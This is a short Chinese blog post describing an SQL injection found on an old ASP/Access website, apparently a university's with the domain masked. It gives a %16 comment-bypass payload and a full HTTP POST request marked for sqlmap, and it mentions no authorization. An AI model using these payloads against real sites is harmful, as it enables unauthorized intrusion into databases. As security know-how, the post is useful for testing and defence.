活久见-某高校古老站Access 数据库 SQL注入
原创
©著作权归作者所有:来自51CTO博客作者OceanSec的原创作品,请联系作者获取转载授权,否则将追究法律责任
在渗透测试中如果出现这样的报错
Microsoft JET Database Engine 错误 '80040e14'
说明存在access sql注入
因为access注入点不在最后,Access数据库没有注释符,所以暂时无法利用
但是有时候可以使用Null,也就是%00,来移除查询语句里面一些无用的部分。但是在有些情况便无法使用这种方式,例如PHP里面开启了magic_quote_gpc参数,那么便会在Null前面添加反斜杠,从而导致失去意义;为了避免这种可能存在的情况,我们可以使用%16,也就是SYN 字符,来实现相同的效果
比如此处,注入点闭合前半部分后,后半部分就可以使用 %16 滤掉后边的内容
selectTime=1') and 1=1 %16
使用sqlmap post 使用 * 星号指定 位置 注入
POST /WebClassAll.asp HTTP/1.1
Host: www.****edu.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCSARBSBS=********
Referer: http://www.********.edu.cn/WebClass.asp?ID=499
Accept-Encoding: gzip
selectTime=1') * %16
get确实存在sql注入
